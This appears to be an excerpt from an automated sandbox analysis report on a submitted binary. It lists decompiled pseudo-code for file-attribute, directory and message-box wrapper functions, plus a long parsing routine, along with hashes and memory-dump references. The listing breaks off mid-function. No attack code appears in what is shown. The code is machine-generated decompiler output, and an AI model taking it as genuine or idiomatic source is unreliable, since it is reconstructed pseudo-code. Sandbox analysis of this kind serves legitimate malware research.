                              • Opcode ID: aaa2e24e3cadb2417611b806b2e2b1e55713074da21130e803bc74bd8fb11f06
                              • Instruction ID: 9a45e8f854b003a178289988cc7fc064ae5902da4cc88310474d582750e90668
                              • Opcode Fuzzy Hash: aaa2e24e3cadb2417611b806b2e2b1e55713074da21130e803bc74bd8fb11f06
                              • Instruction Fuzzy Hash: 0BC08C26209231439A043ABA3805ACB171E0EC122030AC0BBB800A2059CB288DC221DC
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00405C5A Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON
                              Download Yara Rule
                              C-Code - Quality: 58%
                              			E00405C5A(void** __ecx, FILETIME* _a4, FILETIME* _a8, FILETIME* _a12) {
				signed int _t4;

				_t4 = SetFileTime( *__ecx, _a4, _a8, _a12); // executed
				asm("sbb eax, eax");
				return  ~( ~_t4);
			}




                              0x00405c68
                              0x00405c70
                              0x00405c74

                              APIs
                              • SetFileTime.KERNELBASE(?,?,?,?,00405C84,00000000,00000000,?,00402E12,?), ref: 00405C68
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: FileTime
                              • String ID:
                              • API String ID: 1425588814-0
                              • Opcode ID: c611d48c496a84d7274e6d5b9c1e90c61bae575044892d23a6eff34163934cc8
                              • Instruction ID: 87fe90df0bd66b56430cb58ce5188ab21e49bedd0782b4bf3c7b48ca6ef22eff
                              • Opcode Fuzzy Hash: c611d48c496a84d7274e6d5b9c1e90c61bae575044892d23a6eff34163934cc8
                              • Instruction Fuzzy Hash: 8EC04C36158105FF8F020F70CC04C5EBFA2EB99711F10C918B269C40B0C7328024EB02
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040489C Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0040489C(CHAR* __ecx, long __edx) {
				signed int _t3;

				_t3 = SetFileAttributesA(__ecx, __edx); // executed
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                              0x0040489e
                              0x004048a9

                              APIs
                              • SetFileAttributesA.KERNELBASE(?,00000000,00404D1C,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 0040489E
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 9ef3a3077910c683e57a22045a29601e29b9581d2df390f15cf492c25b36c35e
                              • Instruction ID: c0231da6564a4fbd22ddd4f059f5cfeb57e5ba4ab4dd36146b68eeddd1056acd
                              • Opcode Fuzzy Hash: 9ef3a3077910c683e57a22045a29601e29b9581d2df390f15cf492c25b36c35e
                              • Instruction Fuzzy Hash: 5BA002A03112059BA6145B315E0AB6F296DEDC9AE1705C56C7412C5060EB29C9505565
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040498D Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0040498D(CHAR* __ecx) {
				signed int _t3;

				_t3 = CreateDirectoryA(__ecx, 0); // executed
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                              0x00404990
                              0x0040499b

                              APIs
                              • CreateDirectoryA.KERNELBASE(?,00000000,00405228,?,?,?,?,00000003,?,00000000,?,00000000), ref: 00404990
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: CreateDirectory
                              • String ID:
                              • API String ID: 4241100979-0
                              • Opcode ID: b19b64997772cde21bab08b79878e27a599263e6d5f620d435ec54b846f4109b
                              • Instruction ID: 18df801fa9cda183c38834b8287032c54ef98b8f5de1dc60049a64e9909c76fe
                              • Opcode Fuzzy Hash: b19b64997772cde21bab08b79878e27a599263e6d5f620d435ec54b846f4109b
                              • Instruction Fuzzy Hash: DCA0223030030283E2200F320E0AB0F280CAF08AC0F00C02C3000C80E0FB28C000008C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004048AA Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004048AA(CHAR* __ecx) {
				signed int _t3;

				_t3 = RemoveDirectoryA(__ecx); // executed
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                              0x004048ab
                              0x004048b6

                              APIs
                              • RemoveDirectoryA.KERNELBASE(?,00404D27,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 004048AB
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: DirectoryRemove
                              • String ID:
                              • API String ID: 597925465-0
                              • Opcode ID: 5eb19e86367385bc71ec08970d66f6ec81c8b6c1d5f16cf833c81eadf1f07443
                              • Instruction ID: 8a2519b774f471bade5b05e48f192836a719b77eeaa2736f11b150acbb720719
                              • Opcode Fuzzy Hash: 5eb19e86367385bc71ec08970d66f6ec81c8b6c1d5f16cf833c81eadf1f07443
                              • Instruction Fuzzy Hash: E7A002603112058796241B315F0968F295D9D455D1706C5696516C4060DB29C5505555
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Function 00418320 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 46%
                              			E00418320(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t4;
				intOrPtr* _t7;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t15;
				void* _t17;

				_t14 = 0;
				_t17 =  *0x423514 - _t14; // 0x0
				if(_t17 != 0) {
					L4:
					_t4 =  *0x423518; // 0x0
					if(_t4 != 0) {
						_t14 =  *_t4();
						if(_t14 != 0) {
							_t7 =  *0x42351c; // 0x0
							if(_t7 != 0) {
								_t14 =  *_t7(_t14);
							}
						}
					}
					return  *0x423514(_t14, _a4, _a8, _a12);
				}
				_t15 = LoadLibraryA("user32.dll");
				if(_t15 == 0) {
					L10:
					return 0;
				}
				_t11 = GetProcAddress(_t15, "MessageBoxA");
				 *0x423514 = _t11;
				if(_t11 == 0) {
					goto L10;
				} else {
					 *0x423518 = GetProcAddress(_t15, "GetActiveWindow");
					 *0x42351c = GetProcAddress(_t15, "GetLastActivePopup");
					goto L4;
				}
			}









                              0x00418321
                              0x00418323
                              0x0041832b
                              0x0041836f
                              0x0041836f
                              0x00418376
                              0x0041837a
                              0x0041837e
                              0x00418380
                              0x00418387
                              0x0041838c
                              0x0041838c
                              0x00418387
                              0x0041837e
                              0x00000000
                              0x0041839b
                              0x00418338
                              0x0041833c
                              0x004183a5
                              0x00000000
                              0x004183a5
                              0x0041834a
                              0x0041834e
                              0x00418353
                              0x00000000
                              0x00418355
                              0x00418363
                              0x0041836a
                              0x00000000
                              0x0041836a

                              APIs
                              • LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,0041795A,?,Microsoft Visual C++ Runtime Library,00012010,?,0041BD2C,?,0041BD7C,?,?,?,Runtime Error!Program: ), ref: 00418332
                              • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0041834A
                              • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0041835B
                              • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00418368
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                              • API String ID: 2238633743-4044615076
                              • Opcode ID: 3f0a24d6d85b05054a3dd2e72677b881a91c1b783ec14cf3ede4e9bf1f2578f7
                              • Instruction ID: e87ed1bb16eb8be6f8b96595097180185a60ce52c98033cfd4ddfb8cddd90555
                              • Opcode Fuzzy Hash: 3f0a24d6d85b05054a3dd2e72677b881a91c1b783ec14cf3ede4e9bf1f2578f7
                              • Instruction Fuzzy Hash: C50179713002057F87209FB59C80A9B7AF4EB44B45318003EB558C3251DB6DCFC29BE9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040E5A5 Relevance: 1.7, APIs: 1, Instructions: 246COMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 99%
                              			E0040E5A5(intOrPtr __ecx, signed int __edx) {
				signed int _t133;
				intOrPtr _t135;
				signed int _t136;
				signed int _t137;
				signed int _t148;
				intOrPtr _t159;
				signed int _t160;
				intOrPtr _t162;
				void* _t164;
				signed int _t167;
				intOrPtr _t175;
				signed int _t177;
				signed int _t183;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr _t201;
				signed int _t211;
				signed int _t214;
				signed int _t215;
				intOrPtr _t217;
				signed int _t218;
				void* _t219;
				void* _t220;
				void* _t221;
				signed int _t223;
				signed int _t225;
				void* _t226;

				_t211 = __edx;
				E00413954(E0041A690, _t226);
				_t175 = __ecx;
				 *((intOrPtr*)(_t226 - 0x14)) = __ecx;
				E004042D6();
				_t223 =  *(_t226 + 8);
				E00404327( *((intOrPtr*)(_t226 + 0xc)),  *(_t223 + 8));
				while(1) {
					_t133 = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
					_t183 = _t211;
					 *(_t226 - 0x1c) = _t133;
					 *(_t226 - 0x18) = _t183;
					if(_t133 != 0xd) {
						goto L6;
					}
					L2:
					_t211 = 0;
					if(_t183 != 0) {
						L7:
						__eflags = _t133 - 0xa;
						if(_t133 != 0xa) {
							L9:
							__eflags = _t133 - 9;
							if(_t133 != 9) {
								L11:
								__eflags = _t133 | _t183;
								if((_t133 | _t183) == 0) {
									L13:
									_t135 =  *((intOrPtr*)(_t226 + 0xc));
									__eflags =  *((intOrPtr*)(_t135 + 8)) - _t211;
									if( *((intOrPtr*)(_t135 + 8)) != _t211) {
										L17:
										_t184 =  *((intOrPtr*)(_t226 + 0xc));
										_t214 = 0;
										 *(_t226 - 0x10) = 0;
										__eflags =  *((intOrPtr*)(_t184 + 8)) - _t211;
										if( *((intOrPtr*)(_t184 + 8)) <= _t211) {
											L27:
											__eflags =  *(_t226 - 0x1c) - 9;
											if( *(_t226 - 0x1c) == 9) {
												__eflags =  *(_t226 - 0x18) - _t211;
												if( *(_t226 - 0x18) == _t211) {
													_t160 = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
													_t184 =  *((intOrPtr*)(_t226 + 0xc));
													 *(_t226 - 0x18) = _t211;
													 *(_t226 - 0x1c) = _t160;
													_t211 = 0;
													__eflags = 0;
												}
											}
											_t215 =  *(_t223 + 8);
											 *(_t226 - 0x10) = _t211;
											__eflags = _t215 - _t211;
											 *(_t226 + 8) = _t211;
											if(_t215 <= _t211) {
												L37:
												_t136 =  *(_t226 - 0x1c);
												__eflags = _t136 - 0xa;
												if(_t136 != 0xa) {
													L48:
													_t137 = _t136 |  *(_t226 - 0x18);
													__eflags = _t137;
													if(_t137 == 0) {
														_t185 =  *((intOrPtr*)(_t226 + 0x14));
														__eflags =  *((intOrPtr*)(_t185 + 8)) - _t211;
														if( *((intOrPtr*)(_t185 + 8)) != _t211) {
															L54:
															 *[fs:0x0] =  *((intOrPtr*)(_t226 - 0xc));
															return _t137;
														}
														E0040D9F9(_t185,  *(_t226 + 8));
														_t137 = E004042D6();
														_t225 =  *(_t226 + 8);
														__eflags = _t225;
														if(_t225 <= 0) {
															goto L54;
														} else {
															goto L53;
														}
														do {
															L53:
															_t137 = E004039DF( *((intOrPtr*)(_t226 + 0x18)), 0);
															_t225 = _t225 - 1;
															__eflags = _t225;
														} while (_t225 != 0);
														goto L54;
													}
													E0040DBE1( *((intOrPtr*)(_t175 + 0x18)), _t211);
													L50:
													 *(_t226 - 0x1c) = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
													 *(_t226 - 0x18) = _t211;
													goto L36;
												}
												__eflags =  *(_t226 - 0x18) - _t211;
												if(__eflags != 0) {
													goto L48;
												}
												 *(_t226 - 0x48) = _t211;
												 *(_t226 - 0x44) = _t211;
												 *(_t226 - 0x40) = _t211;
												 *((intOrPtr*)(_t226 - 0x3c)) = 1;
												 *((intOrPtr*)(_t226 - 0x4c)) = 0x41b748;
												 *(_t226 - 4) = _t211;
												 *(_t226 - 0x34) = _t211;
												 *(_t226 - 0x30) = _t211;
												 *(_t226 - 0x2c) = _t211;
												 *((intOrPtr*)(_t226 - 0x28)) = 4;
												 *((intOrPtr*)(_t226 - 0x38)) = 0x41b684;
												 *(_t226 - 4) = 1;
												E0040E23F(_t175, __eflags,  *(_t226 - 0x10), _t226 - 0x4c, _t226 - 0x38);
												_t177 = 0;
												__eflags =  *(_t223 + 8);
												 *(_t226 + 0x10) = 0;
												if( *(_t223 + 8) <= 0) {
													L47:
													 *(_t226 - 4) =  *(_t226 - 4) & 0x00000000;
													E004042AD(_t226 - 0x38);
													 *(_t226 - 4) =  *(_t226 - 4) | 0xffffffff;
													E004042AD(_t226 - 0x4c);
													_t175 =  *((intOrPtr*)(_t226 - 0x14));
													goto L50;
												} else {
													goto L40;
												}
												do {
													L40:
													_t217 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t177 * 4));
													_t148 =  *( *((intOrPtr*)( *((intOrPtr*)(_t226 + 0xc)) + 0xc)) + _t177 * 4);
													__eflags = _t148 - 1;
													if(_t148 != 1) {
														L43:
														__eflags = _t148;
														if(_t148 <= 0) {
															goto L46;
														}
														_t218 = _t148;
														do {
															E0040C413( *((intOrPtr*)(_t226 + 0x14)),  *((intOrPtr*)( *(_t226 - 0x40) +  *(_t226 + 0x10))));
															E004039DF( *((intOrPtr*)(_t226 + 0x18)),  *((intOrPtr*)( *(_t226 - 0x2c) +  *(_t226 + 0x10) * 4)));
															 *(_t226 + 0x10) =  *(_t226 + 0x10) + 1;
															_t218 = _t218 - 1;
															__eflags = _t218;
														} while (_t218 != 0);
														goto L46;
													}
													__eflags =  *((char*)(_t217 + 0x54));
													if( *((char*)(_t217 + 0x54)) == 0) {
														goto L43;
													}
													E0040C413( *((intOrPtr*)(_t226 + 0x14)), _t148);
													E004039DF( *((intOrPtr*)(_t226 + 0x18)),  *((intOrPtr*)(_t217 + 0x50)));
													L46:
													_t177 = _t177 + 1;
													__eflags = _t177 -  *(_t223 + 8);
												} while (_t177 <  *(_t223 + 8));
												goto L47;
											} else {
												 *(_t226 + 0x10) =  *(_t184 + 0xc);
												do {
													_t201 =  *((intOrPtr*)( *(_t226 + 0x10) + _t211 * 4));
													__eflags = _t201 - 1;
													if(_t201 != 1) {
														L34:
														_t64 = _t226 - 0x10;
														 *_t64 =  *(_t226 - 0x10) + _t201;
														__eflags =  *_t64;
														goto L35;
													}
													_t159 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t211 * 4));
													__eflags =  *((char*)(_t159 + 0x54));
													if( *((char*)(_t159 + 0x54)) != 0) {
														goto L35;
													}
													goto L34;
													L35:
													 *(_t226 + 8) =  *(_t226 + 8) + _t201;
													_t211 = _t211 + 1;
													__eflags = _t211 - _t215;
												} while (_t211 < _t215);
												L36:
												_t211 = 0;
												__eflags = 0;
												goto L37;
											}
										} else {
											goto L18;
										}
										do {
											L18:
											_t162 =  *((intOrPtr*)( *(_t184 + 0xc) + _t214 * 4));
											__eflags = _t162 - _t211;
											if(_t162 == _t211) {
												goto L26;
											}
											__eflags = _t162 - 1;
											 *(_t226 - 0x24) = _t211;
											 *(_t226 - 0x20) = _t211;
											if(_t162 <= 1) {
												L25:
												_t164 = E0040C281( *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t214 * 4)));
												asm("sbb edx, [ebp-0x20]");
												E0040F953( *(_t226 + 0x10), _t164 -  *(_t226 - 0x24), _t211);
												_t184 =  *((intOrPtr*)(_t226 + 0xc));
												_t211 = 0;
												__eflags = 0;
												goto L26;
											}
											_t167 = _t162 - 1;
											__eflags = _t167;
											 *(_t226 + 8) = _t167;
											do {
												__eflags =  *(_t226 - 0x1c) - 9;
												if( *(_t226 - 0x1c) == 9) {
													__eflags =  *(_t226 - 0x18) - _t211;
													if( *(_t226 - 0x18) == _t211) {
														_t219 = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
														E0040F953( *(_t226 + 0x10), _t219, _t211);
														 *(_t226 - 0x24) =  *(_t226 - 0x24) + _t219;
														_t214 =  *(_t226 - 0x10);
														asm("adc [ebp-0x20], ebx");
														_t175 =  *((intOrPtr*)(_t226 - 0x14));
														_t211 = 0;
														__eflags = 0;
													}
												}
												_t36 = _t226 + 8;
												 *_t36 =  *(_t226 + 8) - 1;
												__eflags =  *_t36;
											} while ( *_t36 != 0);
											goto L25;
											L26:
											_t214 = _t214 + 1;
											__eflags = _t214 -  *((intOrPtr*)(_t184 + 8));
											 *(_t226 - 0x10) = _t214;
										} while (_t214 <  *((intOrPtr*)(_t184 + 8)));
										goto L27;
									}
									_t220 = 0;
									__eflags =  *(_t223 + 8) - _t211;
									if( *(_t223 + 8) <= _t211) {
										goto L17;
									} else {
										goto L15;
									}
									do {
										L15:
										E004039DF( *((intOrPtr*)(_t226 + 0xc)), 1);
										_t220 = _t220 + 1;
										__eflags = _t220 -  *(_t223 + 8);
									} while (_t220 <  *(_t223 + 8));
									_t211 = 0;
									__eflags = 0;
									goto L17;
								}
								E0040DBE1( *((intOrPtr*)(_t175 + 0x18)), _t211);
								while(1) {
									_t133 = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
									_t183 = _t211;
									 *(_t226 - 0x1c) = _t133;
									 *(_t226 - 0x18) = _t183;
									if(_t133 != 0xd) {
										goto L6;
									}
									goto L2;
								}
								goto L6;
							}
							__eflags = _t183 - _t211;
							if(_t183 == _t211) {
								goto L13;
							}
							goto L11;
						}
						__eflags = _t183 - _t211;
						if(_t183 == _t211) {
							goto L13;
						}
						goto L9;
					}
					_t221 = 0;
					if( *(_t223 + 8) <= 0) {
						continue;
					} else {
						goto L4;
					}
					do {
						L4:
						E004039DF( *((intOrPtr*)(_t226 + 0xc)), E0040DC90(0));
						_t221 = _t221 + 1;
					} while (_t221 <  *(_t223 + 8));
					continue;
					L6:
					_t211 = 0;
					__eflags = 0;
					goto L7;
				}
			}






























                              0x0040e5a5
                              0x0040e5aa
                              0x0040e5b3
                              0x0040e5ba
                              0x0040e5bd
                              0x0040e5c2
                              0x0040e5cb
                              0x0040e5d0
                              0x0040e5d3
                              0x0040e5d8
                              0x0040e5dd
                              0x0040e5e0
                              0x0040e5e3
                              0x00000000
                              0x00000000
                              0x0040e5e5
                              0x0040e5e5
                              0x0040e5e9
                              0x0040e60d
                              0x0040e60d
                              0x0040e610
                              0x0040e616
                              0x0040e616
                              0x0040e619
                              0x0040e61f
                              0x0040e61f
                              0x0040e621
                              0x0040e62d
                              0x0040e62d
                              0x0040e630
                              0x0040e633
                              0x0040e64e
                              0x0040e64e
                              0x0040e651
                              0x0040e653
                              0x0040e656
                              0x0040e659
                              0x0040e6d1
                              0x0040e6d1
                              0x0040e6d5
                              0x0040e6d7
                              0x0040e6da
                              0x0040e6df
                              0x0040e6e4
                              0x0040e6e7
                              0x0040e6ea
                              0x0040e6ed
                              0x0040e6ed
                              0x0040e6ed
                              0x0040e6da
                              0x0040e6ef
                              0x0040e6f2
                              0x0040e6f5
                              0x0040e6f7
                              0x0040e6fa
                              0x0040e726
                              0x0040e726
                              0x0040e729
                              0x0040e72c
                              0x0040e80e
                              0x0040e80e
                              0x0040e80e
                              0x0040e811
                              0x0040e82e
                              0x0040e831
                              0x0040e834
                              0x0040e85a
                              0x0040e860
                              0x0040e868
                              0x0040e868
                              0x0040e839
                              0x0040e841
                              0x0040e846
                              0x0040e849
                              0x0040e84b
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040e84d
                              0x0040e84d
                              0x0040e852
                              0x0040e857
                              0x0040e857
                              0x0040e857
                              0x00000000
                              0x0040e84d
                              0x0040e816
                              0x0040e81b
                              0x0040e823
                              0x0040e826
                              0x00000000
                              0x0040e826
                              0x0040e732
                              0x0040e735
                              0x00000000
                              0x00000000
                              0x0040e73b
                              0x0040e73e
                              0x0040e741
                              0x0040e744
                              0x0040e74b
                              0x0040e752
                              0x0040e755
                              0x0040e758
                              0x0040e75b
                              0x0040e75e
                              0x0040e765
                              0x0040e776
                              0x0040e77d
                              0x0040e782
                              0x0040e784
                              0x0040e787
                              0x0040e78a
                              0x0040e7f1
                              0x0040e7f1
                              0x0040e7f8
                              0x0040e7fd
                              0x0040e804
                              0x0040e809
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040e78c
                              0x0040e78c
                              0x0040e795
                              0x0040e798
                              0x0040e79b
                              0x0040e79e
                              0x0040e7bc
                              0x0040e7bc
                              0x0040e7be
                              0x00000000
                              0x00000000
                              0x0040e7c0
                              0x0040e7c2
                              0x0040e7cf
                              0x0040e7e0
                              0x0040e7e5
                              0x0040e7e8
                              0x0040e7e8
                              0x0040e7e8
                              0x00000000
                              0x0040e7c2
                              0x0040e7a0
                              0x0040e7a4
                              0x00000000
                              0x00000000
                              0x0040e7aa
                              0x0040e7b5
                              0x0040e7eb
                              0x0040e7eb
                              0x0040e7ec
                              0x0040e7ec
                              0x00000000
                              0x0040e6fc
                              0x0040e6ff
                              0x0040e702
                              0x0040e705
                              0x0040e708
                              0x0040e70b
                              0x0040e719
                              0x0040e719
                              0x0040e719
                              0x0040e719
                              0x00000000
                              0x0040e719
                              0x0040e710
                              0x0040e713
                              0x0040e717
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040e71c
                              0x0040e71c
                              0x0040e71f
                              0x0040e720
                              0x0040e720
                              0x0040e724
                              0x0040e724
                              0x0040e724
                              0x00000000
                              0x0040e724
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040e65b
                              0x0040e65b
                              0x0040e65e
                              0x0040e661
                              0x0040e663
                              0x00000000
                              0x00000000
                              0x0040e665
                              0x0040e668
                              0x0040e66b
                              0x0040e66e
                              0x0040e6a8
                              0x0040e6ae
                              0x0040e6b9
                              0x0040e6be
                              0x0040e6c3
                              0x0040e6c6
                              0x0040e6c6
                              0x00000000
                              0x0040e6c6
                              0x0040e670
                              0x0040e670
                              0x0040e671
                              0x0040e674
                              0x0040e674
                              0x0040e678
                              0x0040e67a
                              0x0040e67d
                              0x0040e68c
                              0x0040e690
                              0x0040e695
                              0x0040e698
                              0x0040e69b
                              0x0040e69e
                              0x0040e6a1
                              0x0040e6a1
                              0x0040e6a1
                              0x0040e67d
                              0x0040e6a3
                              0x0040e6a3
                              0x0040e6a3
                              0x0040e6a3
                              0x00000000
                              0x0040e6c8
                              0x0040e6c8
                              0x0040e6c9
                              0x0040e6cc
                              0x0040e6cc
                              0x00000000
                              0x0040e65b
                              0x0040e635
                              0x0040e637
                              0x0040e63a
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040e63c
                              0x0040e63c
                              0x0040e641
                              0x0040e646
                              0x0040e647
                              0x0040e647
                              0x0040e64c
                              0x0040e64c
                              0x00000000
                              0x0040e64c
                              0x0040e626
                              0x0040e5d0
                              0x0040e5d3
                              0x0040e5d8
                              0x0040e5dd
                              0x0040e5e0
                              0x0040e5e3
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040e5e3
                              0x00000000
                              0x0040e5d0
                              0x0040e61b
                              0x0040e61d
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040e61d
                              0x0040e612
                              0x0040e614
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040e614
                              0x0040e5eb
                              0x0040e5f0
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040e5f2
                              0x0040e5f2
                              0x0040e5fe
                              0x0040e603
                              0x0040e604
                              0x00000000
                              0x0040e60b
                              0x0040e60b
                              0x0040e60b
                              0x00000000
                              0x0040e60b

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: b07fb5bf97a2b1aa00d72e408e60a61c646f09191d68c079a122928f862f61c3
                              • Instruction ID: 21f6de2b17b1780f59bfe67bff07a3778763215a5d034522e7ff50d1aecbc74d
                              • Opcode Fuzzy Hash: b07fb5bf97a2b1aa00d72e408e60a61c646f09191d68c079a122928f862f61c3
                              • Instruction Fuzzy Hash: 86A1FA70E002099FCB18DF96C4919AEB7B2FFA4314F14887FE815A7291DB39AD61CB54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004126B0 Relevance: .5, Instructions: 481COMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004126B0(void* __eax, signed int* __ecx) {
				intOrPtr _t149;
				unsigned int _t153;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;
				signed int _t160;
				signed int _t161;
				signed char* _t162;
				signed int _t164;
				intOrPtr _t167;
				signed int _t168;
				signed char* _t169;
				signed int _t171;
				signed char* _t179;
